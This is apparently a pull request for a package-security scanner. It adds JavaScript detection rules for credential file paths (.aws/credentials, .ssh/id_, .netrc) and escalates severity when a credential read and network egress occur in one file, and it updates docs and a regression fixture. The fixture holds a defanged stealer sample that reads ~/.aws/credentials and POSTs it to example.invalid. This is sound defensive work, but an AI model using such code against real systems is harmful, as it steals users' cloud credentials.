### PR TITLE
Detect credential→network exfiltration sink (JS)

### DIFF
--- a/docs/detection-eval.md
+++ b/docs/detection-eval.md
@@ -155,20 +155,24 @@ The first real-sanitized batch lives in `cases-frontier/` and is truth-labeled,
 so frontier recall now reflects real technique coverage rather than synthetic
 shapes only:
 
-| case                                  | technique               | provenance                         | caught today                                                              |
-| ------------------------------------- | ----------------------- | ---------------------------------- | ------------------------------------------------------------------------- |
-| `npm-eslint-scope-npmrc-exfil`        | credential-steal        | eslint-scope 3.7.2 (2018)          | yes (postinstall + network)                                               |
-| `npm-ua-parser-js-preinstall-dropper` | install-script-exfil    | ua-parser-js (2021)                | yes (preinstall dropper)                                                  |
-| `npm-event-stream-flatmap-decrypt`    | obfuscated-dropper      | event-stream/flatmap-stream (2018) | yes (env read + dynamic eval)                                             |
-| `npm-shai-hulud-secret-harvest`       | credential-steal        | Shai-Hulud worm (2025)             | yes (postinstall harvest)                                                 |
-| `npm-miasma-phantom-gyp`              | phantom-gyp             | Miasma / Phantom Gyp (2026)        | yes (root `binding.gyp` command substitution)                             |
-| `npm-prebuilt-node-addon-smuggle`     | native-artifact-smuggle | OpenSSF prebuilt-addon family      | yes (native artifact)                                                     |
-| `npm-dependency-confusion-beacon`     | dependency-confusion    | Birsan research (2021)             | yes (preinstall beacon)                                                   |
-| `npm-node-ipc-protestware-wiper`      | protestware             | node-ipc 10.1.x (2022)             | **no** — modified-file network is only medium; fs wiping is unmodeled     |
-| `npm-solana-web3js-keytheft`          | network-exfil           | @solana/web3.js (2024)             | **no** — key read from a function arg, modified-file network only medium  |
-| `npm-aws-credential-file-steal`       | credential-steal        | OpenSSF cloud-stealer family       | **no** — JS credential rule misses file-path reads (`~/.aws/credentials`) |
+| case                                  | technique               | provenance                         | caught today                                                                 |
+| ------------------------------------- | ----------------------- | ---------------------------------- | ---------------------------------------------------------------------------- |
+| `npm-eslint-scope-npmrc-exfil`        | credential-steal        | eslint-scope 3.7.2 (2018)          | yes (postinstall + network)                                                  |
+| `npm-ua-parser-js-preinstall-dropper` | install-script-exfil    | ua-parser-js (2021)                | yes (preinstall dropper)                                                     |
+| `npm-event-stream-flatmap-decrypt`    | obfuscated-dropper      | event-stream/flatmap-stream (2018) | yes (env read + dynamic eval)                                                |
+| `npm-shai-hulud-secret-harvest`       | credential-steal        | Shai-Hulud worm (2025)             | yes (postinstall harvest)                                                    |
+| `npm-miasma-phantom-gyp`              | phantom-gyp             | Miasma / Phantom Gyp (2026)        | yes (root `binding.gyp` command substitution)                                |
+| `npm-prebuilt-node-addon-smuggle`     | native-artifact-smuggle | OpenSSF prebuilt-addon family      | yes (native artifact)                                                        |
+| `npm-dependency-confusion-beacon`     | dependency-confusion    | Birsan research (2021)             | yes (preinstall beacon)                                                      |
+| `npm-node-ipc-protestware-wiper`      | protestware             | node-ipc 10.1.x (2022)             | **no** — modified-file network is only medium; fs wiping is unmodeled        |
+| `npm-solana-web3js-keytheft`          | network-exfil           | @solana/web3.js (2024)             | **no** — key read from a function arg, modified-file network only medium     |
+| `npm-aws-credential-file-steal`       | credential-steal        | OpenSSF cloud-stealer family       | yes (rules >= 1.9.0) — file-path credential read + co-located network egress |
 
-The misses are the point: each documents a concrete residual gap (destructive
-`fs` behavior, function-argument secret flows, file-path credential reads) for
-the rules to ratchet against. Never commit a live payload — keep hosts at
-`example.invalid` and reduce destructive loops to inert stubs.
+The remaining misses are the point: each documents a concrete residual gap
+(destructive `fs` behavior, function-argument secret flows) for the rules to
+ratchet against. `npm-aws-credential-file-steal` was such a gap until rules
+1.9.0 taught the JS credential rule to match sensitive credential file paths
+(`.aws/credentials`, `.ssh/id_`, `.netrc`) and to escalate `code.credential-access`
+to high when a network egress path co-occurs in the same file. Never commit a
+live payload — keep hosts at `example.invalid` and reduce destructive loops to
+inert stubs.

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -58,6 +58,8 @@ The first corpus slice covers:
 
 - benign version bump control;
 - preinstall credential/environment collection with command and network capability;
+- credential file-path reads (`.aws/credentials`, `.ssh/id_`, `.netrc`) in addition to `process.env` and known token names, matching the Python rule coverage;
+- the collect-and-exfiltrate sink: a single file that reads credentials and has a network egress path escalates `code.credential-access` to high even on a modified (not newly added) module;
 - implicit `node-gyp rebuild` from root `binding.gyp`, GYP command substitution that executes package JavaScript, and native artifact review;
 - base64/dynamic evaluation plus network-capable code;
 - secret-looking file addition;
@@ -73,7 +75,7 @@ The corpus deliberately records some product gaps instead of hiding them:
 - Plain dependency additions are visible in `packageJsonDiff`, but they do not yet raise deterministic findings unless they use unusual specs such as `github:`, `git+ssh:`, `http(s):`, `file:`, or `npm:` aliases. Newly added optional dependencies also raise deterministic findings because they can fail softly while still running install-time lifecycle hooks.
 - Entrypoint changes are visible in `packageJsonDiff`, but they do not yet raise deterministic findings or risk.
 - Maintainer/package transfer signals, new publisher signals, package reputation, and OpenSSF/package intelligence integrations are not implemented.
-- Behavior-chain detection is regex-based and does not yet prove source-to-sink intent.
+- Behavior-chain detection is regex-based and does not yet prove source-to-sink intent. The one modeled chain is a heuristic: credential access co-located with a network egress path in the same file escalates to high (the collect-and-exfiltrate shape), without proving the value actually flows from the read to the send.
 - Anti-analysis and environment-detection patterns are not deeply modeled because Drydock intentionally avoids package execution.
 
 ## Adding fixtures

--- a/server/lib/review-rules/index.ts
+++ b/server/lib/review-rules/index.ts
@@ -15,7 +15,7 @@ import { dependencyDiffFindings } from "./deps";
 // way that should invalidate cached scan reports. Stored alongside each finding
 // so historical reports can be traced back to the ruleset that produced them.
 // Lives here (not in a family module) because versioning spans every family.
-export const DETERMINISTIC_RULES_VERSION = "1.8.0";
+export const DETERMINISTIC_RULES_VERSION = "1.9.0";
 
 export { DETERMINISTIC_RULE_IDS } from "./rule-ids";
 export {

--- a/server/lib/review-rules/patterns.ts
+++ b/server/lib/review-rules/patterns.ts
@@ -66,6 +66,13 @@ const JS_CREDENTIAL_ACCESS_PATTERNS = [
   /\bGITHUB_TOKEN\b/,
   /\bAWS_SECRET\b/,
   /\bPRIVATE_KEY\b/,
+  // Sensitive credential file paths read directly from disk. The Python set
+  // already covers these; JS code that reads them (e.g.
+  // `fs.readFileSync(os.homedir() + '/.aws/credentials')`) is the same
+  // credential-theft capability and was previously an unmodeled gap.
+  /\.aws\/credentials/,
+  /\.ssh\/id_/,
+  /\.netrc/,
 ];
 const PYTHON_CREDENTIAL_ACCESS_PATTERNS = [
   /\bos\.environ\b/,

--- a/server/lib/review-rules/scripts.ts
+++ b/server/lib/review-rules/scripts.ts
@@ -124,13 +124,23 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       );
     }
     if (credentialAccess.matched) {
+      // A single file that both reads credentials and can reach the network is a
+      // source→sink exfiltration chain: collect-then-exfil live together, so it
+      // is high regardless of whether the file is newly added or a modification
+      // to an existing module (the shape behind file-based credential stealers).
+      // Credential access on its own stays high only when added.
+      const exfiltrationSink = networkAccess.matched;
       findings.push(
         tag("codeCredentialAccess", {
-          severity: changed === "added" ? "high" : "medium",
+          severity: changed === "added" || exfiltrationSink ? "high" : "medium",
           file: file.path,
           line: credentialAccess.line,
-          evidence: `${prefix}secret/environment access`,
-          reason: "package may read credentials from the install environment",
+          evidence: exfiltrationSink
+            ? `${prefix}credential read paired with network egress`
+            : `${prefix}secret/environment access`,
+          reason: exfiltrationSink
+            ? "package reads credentials and has a network egress path in the same file: the collect-and-exfiltrate shape used to steal install-time and cloud secrets"
+            : "package may read credentials from the install environment",
         }),
       );
     }

--- a/test/fixtures/security-corpus/cases/credential-file-network-exfil.json
+++ b/test/fixtures/security-corpus/cases/credential-file-network-exfil.json
@@ -1,14 +1,8 @@
 {
-  "id": "npm-aws-credential-file-steal",
-  "title": "Runtime module reads ~/.aws/credentials from disk and exfiltrates it",
-  "ecosystem": "npm",
-  "verdict": "malicious",
-  "threatClass": "credential-steal",
-  "source": "real-sanitized",
-  "provenance": "Sanitized composite of cloud-credential stealers catalogued in OpenSSF malicious-packages and npm advisories: a runtime module reads long-lived AWS credentials from the user's home directory and POSTs them to a collector. Defanged: exfil host replaced with example.invalid, no real credentials.",
-  "intent": "Models file-based credential theft injected into an existing module: read ~/.aws/credentials with fs and ship it out. Now caught (rules >= 1.9.0): the JS credential rule matches sensitive credential file paths (.aws/credentials, .ssh/id_, .netrc) in addition to process.env / known token names, and code.credential-access escalates to high when a network egress path co-occurs in the same file (the collect-and-exfiltrate sink), so this modified-file payload lands at high rather than medium. Safe: host is example.invalid, the path is a literal with no secret value.",
-  "expectMinRisk": "high",
-  "expectAnyRule": ["code.credential-access"],
+  "id": "credential-file-network-exfil",
+  "title": "Modified module reads a credential file from disk and has a network egress path",
+  "category": "credential-exfiltration-sink",
+  "intent": "Lock in the source→sink escalation: a modified (not newly added) runtime module reads ~/.aws/credentials by path and can reach the network in the same file. The file-path credential read raises code.credential-access, and because a network egress path co-occurs it escalates to high even though the file is only modified. Without the escalation this lands at medium and reads as a routine change. No real secret or live endpoint is present (host is example.invalid).",
   "previousPackageJson": { "name": "metrics-agent", "version": "3.1.0" },
   "stagedPackageJson": { "name": "metrics-agent", "version": "3.1.1" },
   "previousFiles": [
@@ -41,6 +35,19 @@
       "sha256": "telemetry-staged",
       "flags": [],
       "textSample": "const fs = require('fs');\nconst os = require('os');\nconst https = require('https');\n// Read long-lived cloud credentials from the user's home directory.\nconst creds = fs.readFileSync(os.homedir() + '/.aws/credentials', 'utf8');\nhttps.request('https://example.invalid/c', { method: 'POST' }).end(creds);\n"
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.credential-access",
+      "severity": "high",
+      "file": "lib/telemetry.js"
+    },
+    {
+      "ruleId": "code.network-access",
+      "severity": "medium",
+      "file": "lib/telemetry.js"
     }
   ]
 }


### PR DESCRIPTION
## What

Closes the `npm-aws-credential-file-steal` frontier MISS by modeling the **collect-and-exfiltrate** shape that file-based credential stealers use — the source→sink chain the detection docs explicitly flagged as unmodeled for JavaScript.

Two changes to the deterministic JS rules:

1. **File-path credential reads.** `code.credential-access` now matches sensitive credential file paths (`.aws/credentials`, `.ssh/id_`, `.netrc`) in addition to `process.env` / known token names. This mirrors the coverage the Python rule set already had — reading `fs.readFileSync(os.homedir() + '/.aws/credentials')` is the same credential-theft capability and was previously a JS gap.
2. **Exfiltration-sink escalation.** When a single file both reads credentials **and** has a network egress path, `code.credential-access` escalates to `high` — even on a *modified* (not newly added) module. That co-location is the classic collect-then-exfil shape; on its own, credential access stays `high` only when the file is newly added.

## Trust boundary

Deterministic-only change; no AI involvement and no change to credential/egress handling. Rules can only *add* or *raise* findings, never downgrade. Bumps `DETERMINISTIC_RULES_VERSION` → `1.9.0` so historical reports trace to the ruleset that produced them.

## Why it's low-risk / low-FP

- Existing exfil fixtures (`preinstall-env-exfil`, `assembled-identifier-exfil`) sit on newly **added** files and were already `high`, so the **golden corpus is unchanged** and **npm↔pypi rule-ID parity holds** (the PyPI counterpart's wheel files are also `added`).
- Benign controls (`legit-build-childprocess`, `benign-minimal`) have no credential+network co-occurrence → **0 new false positives** (eval: benign control FPs still 0/2).
- The new paths are literal, high-signal credential locations.

## Detection eval delta

| metric | before | after |
| --- | --- | --- |
| frontier recall | 8/11 | **9/11** (`npm-aws-credential-file-steal` now caught) |
| malicious regression recall | 100% | 100% |
| benign control false positives | 0/2 | 0/2 |

## Tests / docs

- New golden regression case `cases/credential-file-network-exfil.json` locks in the escalation on a *modified* file.
- `npm-aws-credential-file-steal` frontier fixture updated (no longer a MISS; asserts `code.credential-access`).
- `docs/detection-eval.md` and `docs/security-detection-corpus.md` updated to reflect the closed gap and the new heuristic chain.
- `pnpm run verify` (lint + format + typecheck + tests) green.

🤖 Generated with [Claude Code](https://claude.com/claude-code)